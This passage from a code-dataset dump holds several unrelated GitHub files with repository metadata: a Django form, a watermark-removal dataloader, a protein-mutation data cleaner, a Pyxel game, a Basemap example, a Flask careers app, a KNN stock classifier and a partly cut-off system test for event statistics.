forms\nfrom django.db.models import fields\nfrom .models import Subscribe\n\n\nclass EmailSubscribeForm(forms.ModelForm):\n    email = forms.EmailField(widget=forms.TextInput(attrs={\n        \"type\": \"email\",\n        \"id\": \"email\",\n        \"class\": \"form-control form-control-lg\",\n        \"name\": \"email\",\n        \"placeholder\": \"Email Address\",\n    }), label=\"\")\n\n    class Meta:\n        model = Subscribe\n        fields = ('email', )\n","repo_name":"sleekidd/learnhouse","sub_path":"subscribe/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22019921340","text":"import paddle\r\nimport os\r\nimport numpy as np\r\nimport cv2\r\nimport random\r\n\r\n\r\nclass MyDateset(paddle.io.Dataset):\r\n    def __init__(self, mode='train', patch=512,\r\n                 watermark_dir='D:/yyc/competition/AIstudio/WatermarkRemoval/watermark_dataset/watermark_datasets.part/',\r\n                 bg_dir='D:/yyc/competition/AIstudio/WatermarkRemoval/watermark_dataset/bg_images/'):\r\n        super(MyDateset, self).__init__()\r\n        # 1->bg:\r\n        # self.part_num = [1, 2, 3, 10]\r\n        # self.bg_num = np.arange(0,552).tolist() + np.arange(1657, 1841).tolist()\r\n        self.bg_num = np.arange(0, 1841).tolist()\r\n\r\n        self.mode = mode\r\n        self.watermark_dir = watermark_dir\r\n        self.bg_dir = bg_dir\r\n        self.patch_size = patch\r\n\r\n    def __getitem__(self, index):\r\n        bg_select = index % len(self.bg_num)\r\n        bg_item = self.bg_num[bg_select]\r\n\r\n        # read in the bg (background) image\r\n        # bg_image_00000.jpg , the bg file naming scheme\r\n        label = cv2.imread(os.path.join(self.bg_dir, 'bg_image_' + str(bg_item).zfill(5) + '.jpg'))\r\n        label = cv2.cvtColor(label, cv2.COLOR_BGR2RGB)\r\n        H, W, _ = label.shape\r\n        # label = paddle.vision.transforms.resize(label, (512,512), interpolation='bilinear')\r\n        label = label.transpose((2, 0, 1))\r\n        label = label / 255\r\n        label = paddle.to_tensor(label).astype('float32')\r\n\r\n        # figure out the folder number holding the watermark files for this bg image\r\n        # if bg_select<184:\r\n        #     part_index = self.part_num[0]\r\n        # elif bg_select<368:\r\n        #     part_index = self.part_num[1]\r\n        # elif bg_select<552:\r\n        #     part_index = self.part_num[2]\r\n        # else:\r\n        #     part_index = self.part_num[3]\r\n\r\n        # adjust the folder that holds the watermark files\r\n        
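# NOTE: the multi-folder branch above stays commented out because this\r\n        # dataset layout keeps every watermark crop in one flat directory\r\n        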
# watermark_dir_part = self.watermark_dir + str(part_index)\r\n        watermark_dir_part = self.watermark_dir\r\n        # print('watermark_dir_part', watermark_dir_part)\r\n\r\n        # randomly select a watermark file as the network input\r\n        watermark_num = np.random.randint(1, 531)\r\n\r\n        # bg_image_00000_0001.jpg , the watermark file naming scheme\r\n        water_marker_list = []\r\n        for k in range(0, 1):\r\n            img = cv2.imread(os.path.join(watermark_dir_part,\r\n                                          'bg_image_' + str(bg_item).zfill(5) + '_' + str(watermark_num + k).zfill(\r\n                                              4) + '.jpg'))\r\n            if img is None:\r\n                print(os.path.join(watermark_dir_part,\r\n                                   'bg_image_' + str(bg_item).zfill(5) + '_' + str(watermark_num + k).zfill(\r\n                                       4) + '.jpg'))\r\n            img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n            # img = paddle.vision.transforms.resize(img, (512,512), interpolation='bilinear')\r\n            img = img.transpose((2, 0, 1))\r\n            img = np.expand_dims(img, 0)\r\n            img = img / 255\r\n            img = paddle.to_tensor(img).astype('float32')\r\n            water_marker_list.append(img)\r\n        water_marker_input = paddle.concat(water_marker_list, 0)\r\n\r\n        wi = random.randint(0, (W - self.patch_size))\r\n        hi = random.randint(0, (H - self.patch_size))\r\n\r\n        water_marker_input = water_marker_input[:, :, hi: hi + self.patch_size, wi: wi + self.patch_size].squeeze(0)\r\n        label = label[:, hi: hi + self.patch_size, wi: wi + self.patch_size]\r\n\r\n        water_marker_input = paddle.vision.transforms.resize(water_marker_input, (256, 256), interpolation='bilinear')\r\n        label = paddle.vision.transforms.resize(label, (256, 256), interpolation='bilinear')\r\n\r\n        return water_marker_input, label\r\n\r\n    def __len__(self):\r\n        return len(self.bg_num)\r\n\r\n\r\ndef main():\r\n    train_dataset = MyDateset()\r\n    train_dataloader = paddle.io.DataLoader(\r\n        train_dataset,\r\n        batch_size=4,\r\n        shuffle=True,\r\n        drop_last=False)\r\n\r\n    for step, data in enumerate(train_dataloader):\r\n        img, label = data\r\n        print(step, img.shape, label.shape)\r\n\r\n\r\n# test the dataloader\r\nif __name__ == '__main__':\r\n    main()\r\n","repo_name":"y2cyyc/Baidu_AI_WatermarkRemoval","sub_path":"dataloader2.py","file_name":"dataloader2.py","file_ext":"py","file_size_in_byte":4155,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"27639274753","text":"# -*- coding: utf-8 -*-\n# Install and File Management:\nimport click\nimport logging\nfrom pathlib import Path\nfrom dotenv import find_dotenv, load_dotenv\n# Cleaning Datasets:\nimport pandas as pd\nimport numpy as np\nfrom data_class import MutantDataset\n\n\ndef Clean_Skempi(path):\n    '''\n    Purpose:\n        1. Loads SKEMPI CSV file.\n        2. Calculates ddG\n        3. For multiple measurements, keeps the median value\n        4. Eliminates entries with mutations on both sides of the interface\n    Input:\n        path : Location of SKEMPI CSV file or pd.DataFrame\n    Output:\n        SKEMPI_SingleSided : MutantDataset(pd.DataFrame)\n    Note:\n        SKEMPI-specific steps are coded here, while universal\n        steps are handled by MutantDataset methods.\n        Content and order subject to change with additional datasets.\n        It is foreseeable that some steps may occur post combination.\n    '''\n    # Initialize class\n    skempi = MutantDataset(path, sep=';')\n\n    # Convert 'Temperature' comments/str's to numeric values. 
Default is 298\n    skempi['Temperature'] = skempi['Temperature'].str.extract(r'(\\d+)')\n    skempi['Temperature'] = skempi.to_numeric('Temperature')\n    skempi['Temperature'].fillna(value=298, inplace=True)  # 6665-6668 blank\n\n    # Calculate free energies\n    dropna_lst = ['Affinity_wt_parsed', 'Affinity_mut_parsed']\n    skempi.dropna(subset=dropna_lst, inplace=True)\n    skempi = skempi.solve_ddG('Affinity_wt_parsed', 'Affinity_mut_parsed')\n\n    # Median and duplicate ddG/tmp values\n    group_keys = ['#Pdb', 'Mutation(s)_cleaned']\n    skempi['ddgMedian'] = skempi.groupby(group_keys)['ddG'].transform('median')\n    skempi.drop_duplicates(subset=[*group_keys, 'Temperature'], keep='first',\n                           inplace=True)\n\n    # Flag multiple mutations in the same protein\n    skempi['MutSplit'] = skempi['Mutation(s)_cleaned'].str.split(',')\n    skempi['NumMutations'] = skempi['MutSplit'].apply(len)\n\n    # Extract Chains and remove cross chain mutations.\n    skempi['CrossChain'] = skempi.find_cross_chains()\n    SKEMPI_SingleSided = skempi[~skempi.CrossChain]  # cool trick inverts bool\n    return SKEMPI_SingleSided\n\n\ndef Clean_Other(path):\n    '''Future dataset cleaned here'''\n    pass\n\n\n# @click commands removed, extra complexity and CLI unnecessary ATM\ndef main():\n    \"\"\" Runs data processing scripts to turn raw data from (../raw) into\n    cleaned data ready to be analyzed (saved in ../processed).\n\n    1) clean each dataset to create consistent MutantDataset's\n    1a) store individuals in ~/data/intermediate\n    2) combine into uniform MutantDataset\n    2a) store in ~/data/final\n    (may not save individuals. Rather, uniform saved to intermediate,\n    then features is run (FoldX, iAlign) to produce final. Such a change\n    will be made with the implementation of feature scripts.)\n    \"\"\"\n    # Static\n    filepath = {\n        'input': 'data/raw/',\n        'interim': 'data/interim/',\n        'output': 'data/processed/'\n    }\n\n    columns = ['#Pdb', 'Mutation(s)_cleaned', 'Temperature',\n               'ddgMedian', 'NumMutations']\n\n    # 1.0 – Clean skempi\n    skempi_cleaned = Clean_Skempi(filepath['input'] + 'skempi_2.0.csv')\n    skempi_final = skempi_cleaned[columns]\n    # Log Info\n    NumProteins = skempi_final['#Pdb'].nunique()\n    NumMutations = skempi_final['#Pdb'].count()\n    print(f'There are {NumMutations} unique single sided '\n          f'mutations in {NumProteins} proteins')\n    # 1.0a save intermediate to interim\n    skempi_final.to_csv(filepath['interim'] + 'skempi_final.csv')\n\n    # 1.1 – Import Other\n    # other_final = Clean_Other(filepath['input'] + 'other.csv')\n    # 1.1a – save intermediate to intermediates\n    # Other_final.to_csv('data/intermediate')\n\n    # 2 – Combine datasets\n    # code\n    # 2a – save final to processed\n    # combined.to_csv('data/processed')\n    skempi_final.to_csv(filepath['output'] + 'skempi_final.csv')\n\n    logger = logging.getLogger(__name__)\n    logger.info('making final data set from raw data')\n\n\nif __name__ == '__main__':\n    log_fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n    logging.basicConfig(level=logging.INFO, format=log_fmt)\n\n    # not used in this stub but often useful for finding various files\n    project_dir = Path(__file__).resolve().parents[2]\n\n    # find .env automagically by walking up directories until it's found, then\n    # load up the .env entries as environment variables\n    load_dotenv(find_dotenv())\n\n    main()\n","repo_name":"BioSciResearch/optimus_bind_sample","sub_path":"src/data/make_dataset.py","file_name":"make_dataset.py","file_ext":"py","file_size_in_byte":4544,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"}
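A minimal standalone sketch of the median/dedup step used in Clean_Skempi above, using plain pandas on toy rows (the frame values are illustrative, not real SKEMPI entries):
import pandas as pd
df = pd.DataFrame({'#Pdb': ['1A22', '1A22', '1B41'],
                   'Mutation(s)_cleaned': ['KA15A', 'KA15A', 'EC33Q'],
                   'ddG': [1.2, 1.6, -0.3]})
group_keys = ['#Pdb', 'Mutation(s)_cleaned']
# transform('median') broadcasts each group's median back onto every row,
# so repeated measurements agree before the duplicates are dropped
df['ddgMedian'] = df.groupby(group_keys)['ddG'].transform('median')
df = df.drop_duplicates(subset=group_keys, keep='first')
print(df)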
+{"seq_id":"15435802022","text":"import argparse\nimport math\nfrom random import randint\n\nimport pyxel\n\n# sprite definitions are just pieces of the image(s) in the .pyxres file\n# look at it in the editor to see what I mean\n# - image number in the .pyxres file with the images (currently always 0)\n# - x coordinate in the source image to start at\n# - y coordinate in the source image\n# - width of the piece to grab\n# - height of the piece to grab\n# - [optional] what color to make transparent (-1 means no transparency)\n\n# Background Sprites\n\n# Foreground Sprites\nFLOOR_SPRITE = (0, 0, 16, 40, 8, 12)\nFRUIT_SPRITE = [\n (0, 32, 0, 16, 16, 12),\n (0, 48, 0, 16, 16, 12),\n (0, 64, 0, 16, 16, 12),\n (0, 80, 0, 16, 16, 12)\n]\nPLAYER_SPRITE = [\n (0, 0, 0, 16, 16, 12,), # Player when falling\n (0, 16, 0, 16, 16, 12,), # Player when jumping\n]\n\nBLOCK_SIZE = 16\n\n# Some level \"themes\" of blocks and ladders\nclass LevelTheme():\n def __init__(self, theme_idx):\n y = 16*theme_idx\n\n self.block_1x = (1, 0, y, 16, 16, -1)\n self.block_4x = (1, 0, y, 64, 16, -1)\n self.ladder_top = (1, 64, y, 16, 16, -1)\n self.ladder = (1, 64, y, 16, 16, -1)\n\n def draw_blocks(self, x, y, draw_w, draw_h):\n img, u, v, w, h, colkey = self.block_4x\n\n for x_offset in range(0, draw_w, 48):\n for y_offset in range(0, draw_h, 16):\n w = min(draw_w - x_offset, 48)\n h = min(draw_h - y_offset, 16)\n\n pyxel.blt(x + x_offset, y + y_offset, img, u, v, w, h, colkey)\n\nTHEME_ZIG_ZAG = LevelTheme(0)\nTHEME_GOLD_BLOCKS = LevelTheme(1)\nTHEME_BRICKS = LevelTheme(2)\nTHEME_GRASS = LevelTheme(3)\nTHEME_MASONRY = LevelTheme(4)\n\nTHEMES = [LevelTheme(i) for i in range(5)]\n\nBASE_FPS = 30\n\nclass Floor:\n def __init__(self, floor_x, floor_y, is_active, floor_width=40, floor_height=8, theme=None):\n self.floor_x = int(floor_x) * BLOCK_SIZE\n self.floor_y = int(floor_y) * BLOCK_SIZE\n self.floor_width = int(floor_width) * BLOCK_SIZE\n self.floor_height = min(self.floor_width, int(floor_height) * BLOCK_SIZE)\n self.theme = theme\n self.is_active = is_active\n\n @property\n def left(self):\n return self.floor_x\n\n @property\n def right(self):\n return self.floor_x + self.floor_width\n\n @property\n def top(self):\n return self.floor_y\n\n @property\n def bottom(self):\n return self.floor_y + self.floor_height\n\n\nclass App:\n def __init__(self, fps=BASE_FPS, speed=1.0):\n pyxel.init(256, 256, caption=\"Pyxel Toomy\", fps=fps)\n\n # Load all the images and sounds used in the game\n pyxel.load(\"assets/toomy_game.pyxres\")\n\n self.__speed = speed\n self._fps = fps\n\n # Factor to keep things running normally at different fps / speeds\n self._frame_step = speed * BASE_FPS / fps\n\n # number of frames that would have happened so far at current speed/fps\n # (adjusted when speed changes to keep things rendering at the same spot)\n self.frame_count = 0\n\n # Seconds of 1x-speed game time since game start\n self.game_time = 0.0\n\n # Player info\n self.score = 0\n self.player_x = 72\n self.player_y = 25\n self.player_vy = 0\n self.player_is_alive = True\n\n # Define the stuff on screen\n self.far_cloud = [(-10, 75), (40, 65), (90, 60)]\n self.near_cloud = [(10, 25), (70, 35), (120, 15)]\n self.floor = [\n Floor(\n randint(0, 200//BLOCK_SIZE),\n randint(8, 16),\n True,\n randint(1, 10),\n 1\n ) for i in range(5)]\n self.fruit = [(i * 60, randint(40, 104), randint(0, 3), True) for i in range(5)]\n\n # Start playing music (sound #0)\n pyxel.playm(0, loop=True)\n\n # Run the game (update/draw loop)\n pyxel.run(self.update, 
self.draw)\n\n @property\n def _speed(self):\n return self.__speed\n\n @_speed.setter\n def _speed(self, newval):\n # When speed changes we have to update the frame counter or background things\n # will suddenly jump around\n\n ratio = newval/self.__speed\n self.frame_count /= ratio\n self._frame_step *= ratio\n self.__speed = newval\n\n def update(self):\n if pyxel.btnp(pyxel.KEY_Q):\n pyxel.quit()\n\n if pyxel.btnp(pyxel.KEY_EQUAL):\n self._speed = min(3.0, self._speed + 0.25)\n elif pyxel.btnp(pyxel.KEY_MINUS):\n self._speed = max(0.25, self._speed - 0.25)\n\n self.frame_count += self._frame_step\n self.game_time += self._speed/self._fps\n\n self.update_player()\n\n for i, v in enumerate(self.fruit):\n self.fruit[i] = self.update_fruit(*v)\n\n def update_player(self):\n delta_x = 0\n delta_y = 0\n\n if pyxel.btn(pyxel.KEY_LEFT) or pyxel.btn(pyxel.GAMEPAD_1_LEFT):\n delta_x = self._frame_step * -2\n\n if pyxel.btn(pyxel.KEY_RIGHT) or pyxel.btn(pyxel.GAMEPAD_1_RIGHT):\n delta_x = self._frame_step * 2\n\n if pyxel.btnp(pyxel.KEY_UP) or pyxel.btnp(pyxel.GAMEPAD_1_UP):\n self.player_vy = -10\n\n if pyxel.btn(pyxel.KEY_DOWN) or pyxel.btn(pyxel.GAMEPAD_1_DOWN):\n delta_y = self._frame_step * 2\n\n delta_y += self.player_vy * self._frame_step\n\n x_valid, y_valid = self.validate_movement(delta_x, delta_y)\n\n if x_valid:\n self.player_x += delta_x\n\n if y_valid:\n self.player_y += delta_y\n self.player_vy += self._frame_step\n else:\n self.player_vy = 0\n\n if self.player_y > pyxel.height:\n if self.player_is_alive:\n self.player_is_alive = False\n pyxel.play(3, 5)\n\n if self.player_y > 600:\n self.score = 0\n self.player_x = 72\n self.player_y = -16\n self.player_vy = 0\n self.player_is_alive = True\n\n def validate_movement(self, delta_x, delta_y):\n x_valid = True\n y_valid = True\n\n for floor in self.floor:\n if (\n self.player_x + 16 + delta_x >= floor.left\n and self.player_x + delta_x <= floor.right\n\n and self.player_y + 16 >= floor.top\n and self.player_y <= floor.bottom\n ):\n x_valid = False\n\n if x_valid:\n if (\n self.player_x + 16 + delta_x >= floor.left\n and self.player_x + delta_x <= floor.right\n\n and self.player_y + 16 + delta_y >= floor.top\n and self.player_y + delta_y <= floor.bottom\n ):\n y_valid = False\n\n else:\n if (\n self.player_x + 16 >= floor.left\n and self.player_x <= floor.right\n\n and self.player_y + 16 + delta_y >= floor.top\n and self.player_y + delta_y <= floor.bottom\n ):\n y_valid = False\n\n return x_valid, y_valid\n\n def update_fruit(self, x, y, kind, is_active):\n if is_active and abs(x - self.player_x) < 12 and abs(y - self.player_y) < 12:\n is_active = False\n self.score += (kind + 1) * 100\n self.player_vy = min(self.player_vy, -8)\n pyxel.play(3, 4)\n\n # x -= 2 * self._frame_step\n\n if x < -40:\n x += 240\n y = randint(32, 104)\n kind = randint(0, 3)\n is_active = True\n\n return (x, y, kind, is_active)\n\n def draw(self):\n pyxel.cls(12)\n\n\n # draw floors\n for idx, floor in enumerate(self.floor):\n THEMES[idx].draw_blocks(floor.left, floor.top, floor.floor_width, floor.floor_height)\n #pyxel.blt(x, y, *FLOOR_SPRITE)\n\n # draw fruits\n for x, y, kind, is_active in self.fruit:\n if is_active:\n pyxel.blt(x, y, *FRUIT_SPRITE[kind])\n\n # draw player\n pyxel.blt(self.player_x, self.player_y, *PLAYER_SPRITE[1 if self.player_vy > 0 else 0])\n\n # draw score\n s = \"SCORE {:>4}\".format(self.score)\n pyxel.text(5, 4, s, 1)\n pyxel.text(4, 4, s, 7)\n\n # draw time\n t = self.game_time\n t = f\"{int(t//60)}:{t%60:04.1f}\"\n 
pyxel.text(pyxel.width - 4 - 4*len(t), 4, t, 1)\n        pyxel.text(pyxel.width - 5 - 4*len(t), 4, t, 7)\n\n        # draw current speed\n        s = f\"SPEED {self._speed:0.2f}x\"\n        pyxel.text(pyxel.width - 4 - 4*len(s), 11, s, 1)\n        pyxel.text(pyxel.width - 5 - 4*len(s), 11, s, 7)\n\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--fps', default=75, type=int)\nparser.add_argument('--speed', default=1.0, type=float)\n\nargs = parser.parse_args()\n\nApp(fps=args.fps, speed=args.speed)\n","repo_name":"BryceEakin/pyxel_playground","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":8913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38446976529","text":"from mpl_toolkits.basemap import Basemap\nimport matplotlib.pyplot as plt\n\nmap = Basemap(projection='poly', \n              lon_0=0.0, lat_0=0, \n              llcrnrlon=-80.,llcrnrlat=-40,urcrnrlon=80.,urcrnrlat=40.)\n\nmap.drawmapboundary(fill_color='aqua')\nmap.fillcontinents(color='coral',lake_color='aqua')\nmap.drawcoastlines()\n\nmap.drawparallels(range(-90, 100, 10), linewidth=2, dashes=[4, 2], labels=[1,0,0,1], color='r', zorder=0 )\nplt.show()","repo_name":"rveciana/BasemapTutorial","sub_path":"code_examples/backgrounds/draw_parallels.py","file_name":"draw_parallels.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"37"} +{"seq_id":"6358168370","text":"from flask import Flask, render_template, jsonify, request\nfrom database import load_jobs_from_db, load_job_from_db, add_application_to_db\nfrom flask_sqlalchemy import SQLAlchemy\nimport os\nfrom flask_admin import Admin\n\nadmin=Admin()\ndb=SQLAlchemy()\ndef create_app():\n    \n    app = Flask(__name__)\n    app.config['SQLALCHEMY_DATABASE_URI']=os.environ['DB_CONNECTION_STRING']\n    db.init_app(app)\n    admin.init_app(app)\n    \n    \n    \n    @app.route(\"/\")\n    def mark_careers():\n        jobs_list = load_jobs_from_db()\n        return render_template('home.html', jobs = jobs_list)\n    \n    @app.route(\"/api/jobs\")\n    def list_jobs():\n        jobs_list = load_jobs_from_db()\n        return jsonify(jobs=jobs_list)\n    \n    @app.route(\"/job/<id>\")\n    def show_job(id):\n        job = load_job_from_db(id)\n        if not job:\n            return \"Not found\", 404\n        return render_template('jobpage.html', job = job)\n    \n    @app.route(\"/job/<id>/apply\", methods=['post'])\n    def apply_to_job(id):\n        data = request.form\n        job = load_job_from_db(id)\n        add_application_to_db(id, data)\n        return render_template('application_submitted.html', application=data, job = job)\n\n    return app\n    \n    \n    \nif __name__ == \"__main__\":\n    app=create_app()\n    app.run(host='0.0.0.0', debug=True)","repo_name":"kmark-n/Mark-careers_website_v2","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33760934652","text":"# Predict the future direction of the stock price with the KNN algorithm.\n# ------------------------------------------\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom StockData import YahooData, FeatureSet\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\n\n# Collect Samsung Electronics stock data from the Yahoo site\n#sam = YahooData.getStockData('005930.KS', '2007-01-01')\n\n# Read in the saved file\nsam = pd.read_pickle('data/stockData/005930.KS')\n\n# Extract technical-analysis indicators from the OHLCV price data\n# u = 0.8 : price rises if the return is >= 0.8x its std-dev (class = 2)\n# d = -0.8 : price falls if the return is <= -0.8x its std-dev (class = 1)\n# otherwise the price is flat (class = 
0)\nft = FeatureSet.getFeatureSet(sam, u=0.8, d=-0.7, period=20)\n\n# Inspect the tail of the feature DataSet\nft.tail(10)\n\n# Check that classes (0, 1, 2) are balanced; if not, tune u and d above until they are.\nplt.hist(ft['class'])\nplt.show()\n\n# Build the train and test data sets\nx = ft.iloc[:, 0:6]\ny = ft['class']\ntrainX, testX, trainY, testY = train_test_split(x, y, test_size = 0.2, random_state=None)\n\n# Fit KNN on the training set.\nknn = KNeighborsClassifier(n_neighbors=50, p=2, metric='minkowski')\nknn.fit(trainX, trainY)\n\n# Predict classes for the test-set features and compute the accuracy\npredY = knn.predict(testX)\naccuracy = 100 * (testY == predY).sum() / len(predY)\nprint()\nprint(\"* accuracy on the test data = %.2f\" % accuracy, '%')\n\n# Predict classes for the train-set features and compute the accuracy\npredY = knn.predict(trainX)\naccuracy = 100 * (trainY == predY).sum() / len(predY)\nprint(\"* accuracy on the training data = %.2f\" % accuracy, '%')\n\n# Measure accuracy while varying k\ntestAcc = []\ntrainAcc = []\nfor k in range(5, 100):\n    # Fit KNN on the training set.\n    knn = KNeighborsClassifier(n_neighbors=k, p=2, metric='minkowski')\n    knn.fit(trainX, trainY)\n    \n    # Accuracy on the test-set features\n    predY = knn.predict(testX)\n    testAcc.append((testY == predY).sum() / len(predY))\n    \n    # Accuracy on the train-set features\n    predY = knn.predict(trainX)\n    trainAcc.append((trainY == predY).sum() / len(predY))\n\nplt.figure(figsize=(8, 5))\nplt.plot(testAcc, label=\"Test Data\")\nplt.plot(trainAcc, label=\"Train Data\")\nplt.legend()\nplt.xlabel(\"k\")\nplt.ylabel(\"Accuracy\")\nplt.show()\n\n# Treat the last test sample as today's data and estimate the future price direction\n# If today's measured features are as below, which way will the price go?\ntodayX = pd.DataFrame([(-0.23,-1.45,0.85,0.43,-0.38,0.5)], columns=['macd', 'rsi', 'obv', 'liquidty', 'parkinson', 'volatility'])\npredY = knn.predict(todayX)\nprint()\n\nif predY == 0.0:\n    print(\"* The price is expected to move sideways.\")\nelif predY == 1.0:\n    print(\"* The price is expected to fall.\")\nelse:\n    print(\"* The price is expected to rise.\")\npredProb = knn.predict_proba(todayX)\nprint(\"* probability estimates : \", predProb)\n\n# Pick two features and visually inspect the classes per feature in 2-D\n# The full 6-D feature space cannot be visualized, so check in 2-D\nftX = 0 # x-axis: macd\nftY = 4 # y-axis: parkinson's volatility\ncnt = 100 # plot only 100 points\nclass0 = ft[ft['class'] == 0].iloc[0:cnt, [ftX, ftY]]\ncolX = class0.columns[0]\ncolY = class0.columns[1]\n\nplt.figure(figsize=(8, 7))\nplt.scatter(class0[colX], class0[colY], color='blue', marker='x', s=100, alpha=0.5, label='FLAT')\n\nclass1 = ft[ft['class'] == 1].iloc[0:cnt, [ftX, ftY]]\nplt.scatter(class1[colX], class1[colY], color='red', marker='s', s=100, alpha=0.5, label='DOWN')\n\nclass2 = ft[ft['class'] == 2].iloc[0:cnt, [ftX, ftY]]\nplt.scatter(class2[colX], class2[colY], color='green', marker='o', s=100, alpha=0.5, label='UP')\nplt.xlabel(colX)\nplt.ylabel(colY)\nplt.legend()\nplt.show()\n","repo_name":"lyc1212/R","sub_path":"금융 데이터 사이언스/2-2.knn.py","file_name":"2-2.knn.py","file_ext":"py","file_size_in_byte":4221,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71073724588","text":"from itertools import chain\nfrom time import sleep\nfrom datetime import datetime, timedelta, timezone\nfrom uuid import uuid4\nfrom tests.system_tests import fsmRequests, base_test_class, handlers_examples, elasticRequests\nfrom tests.system_tests.test_data_option import *\n\nneededFields = {\n    'aggregator': 'count',\n    'group_by': '1m',\n}\n\n\nclass TestStatGroups(base_test_class.BaseTest):\n    name = 'test_visionlabs_test_stat_groups_class'\n    start = None\n    stop = None\n    event = None\n    
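# class-level fixtures shared by every test method; populated in __init__ and setUpClass\n    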
events = {}\n handlers = {}\n event_batches_to_create = set()\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n if args[0] in cases:\n TestStatGroups.event_batches_to_create.add(cases[args[0]])\n else:\n TestStatGroups.event_batches_to_create.add('groups')\n\n @classmethod\n def setUpClass(cls):\n # create lists\n reply = cls.lunaClient.createList('descriptors', cls.name)\n assert reply.statusCode == 201, reply.statusCode\n inputListDescriptors = reply.body['list_id']\n\n reply = cls.lunaClient.createList('persons', cls.name)\n assert reply.statusCode == 201, reply.statusCode\n inputListPersons = reply.body['list_id']\n\n reply = cls.lunaClient.createList('persons', cls.name)\n assert reply.statusCode == 201, reply.statusCode\n outputList = reply.body['list_id']\n\n # create descriptors\n for d in descriptorsImgs_search:\n reply = cls.lunaClient.extractDescriptors(filename=d)\n assert reply.statusCode == 201, reply.statusCode\n dId = reply.body[\"faces\"][0][\"id\"]\n\n reply = cls.lunaClient.linkListToDescriptor(dId, inputListDescriptors)\n assert reply.statusCode == 204, reply.statusCode\n\n # create persons\n for p in personsImgs_search:\n reply = cls.lunaClient.createPerson(cls.name)\n assert reply.statusCode == 201, reply.statusCode\n pId = reply.body['person_id']\n cls.personsToDelete += [pId]\n\n reply = cls.lunaClient.extractDescriptors(filename=p)\n assert reply.statusCode == 201, reply.statusCode\n dId = reply.body[\"faces\"][0][\"id\"]\n\n reply = cls.lunaClient.linkDescriptorToPerson(pId, dId)\n assert reply.statusCode == 204, reply.statusCode\n\n reply = cls.lunaClient.linkListToPerson(pId, inputListPersons)\n assert reply.statusCode == 204, reply.statusCode\n\n # remember last person data\n cls.sim_person = pId\n cls.sim_descriptor = dId\n\n # create handlers, events\n cls.start = datetime.now().isoformat('T').split('.')[0] + 'Z'\n for stat_type in cls.event_batches_to_create:\n reply = fsmRequests.createHandler(handlers_examples.searchHandlerTestEvents(\n cls.name, 'groups', inputListDescriptors, inputListPersons, outputList\n ))\n assert reply.statusCode == 201, reply.statusCode\n handler = reply.json['handler_id']\n cls.handlers[stat_type] = reply.json['handler_id']\n\n if stat_type == 'groups':\n reply = fsmRequests.emitEvent(handler, events_search[0],\n {'user_data': cls.name, 'source': cls.name,\n 'tags': cls.name + ',' + cls.name + '1'})\n assert reply.statusCode == 201, reply.json\n sleep(10)\n reply = fsmRequests.emitEvent(handler, events_search[0],\n {'user_data': cls.name, 'source': cls.name,\n 'tags': cls.name + ',' + cls.name + '1'})\n assert reply.statusCode == 201, reply.json\n cls.events[stat_type] = reply.json['events'][0]\n else:\n start = datetime(2017, 1, 1, 0, 0, 0, tzinfo=timezone(timedelta()))\n\n stop = {\n 'monthOfYear': datetime(2018, 1, 1, 0, 0, 0, tzinfo=timezone(timedelta())),\n 'dayOfYear': datetime(2018, 1, 1, 0, 0, 0, tzinfo=timezone(timedelta())),\n 'dayOfMonth': datetime(2017, 2, 1, 0, 0, 0, tzinfo=timezone(timedelta())),\n 'dayOfWeek': datetime(2017, 1, 8, 0, 0, 0, tzinfo=timezone(timedelta())),\n 'hourOfDay': datetime(2017, 1, 2, 0, 0, 0, tzinfo=timezone(timedelta())),\n 'minuteOfDay': datetime(2017, 1, 2, 0, 0, 0, tzinfo=timezone(timedelta())),\n }[stat_type]\n\n delta = {\n 'monthOfYear': timedelta(days=31),\n 'dayOfYear': timedelta(days=1),\n 'dayOfMonth': timedelta(days=1),\n 'dayOfWeek': timedelta(days=1),\n 'hourOfDay': timedelta(hours=1),\n 'minuteOfDay': timedelta(minutes=1),\n }[stat_type]\n\n def 
uploadAsync(startPeriod, stopPeriod, deltaForPeriod):\n current = startPeriod\n dates = []\n while current < stopPeriod:\n dates.append(current)\n current += deltaForPeriod\n\n iterByDates = iter(dates)\n from tornado import gen\n import tornado.ioloop\n\n @gen.coroutine\n def upload(it):\n for uploadDate in it:\n reply = yield elasticRequests.emitGroupAsync(uploadDate.timestamp() * 1000, handler,\n cls.name)\n assert reply.code < 300\n\n tornado.ioloop.IOLoop.current().run_sync(lambda: [upload(iterByDates) for i in range(10)])\n\n uploadAsync(start, stop, delta)\n sleep(1)\n cls.stop = datetime.now().isoformat('T').split('.')[0] + 'Z'\n\n def setUp(self):\n pass\n\n def assertAgregate(self, result, filtersOk, filtersNOk=None):\n defaultFilters = {\n 'aggregator': 'count',\n 'group_by': '1d',\n\n 'handler_ids': result['handler_id']\n }\n if any(f in chain(filtersOk, filtersNOk or {}) for f in defaultFilters):\n defaultFilters = {}\n\n # TP - FP\n reply = fsmRequests.statsGroups({**defaultFilters, **filtersOk})\n self.assertEqual(reply.statusCode, 200, reply.statusCode)\n self.assertEqual(reply.json['total'], 1, reply.json['total'])\n if {**defaultFilters, **filtersOk}['aggregator'] == 'count':\n self.assertEqual(reply.json['hits'][0][1], 2, reply.json['hits'][0][1])\n elif filtersOk['target'] == 'age':\n self.assertAlmostEqual(reply.json['hits'][0][1], result['extract']['attributes'][filtersOk['target']],\n 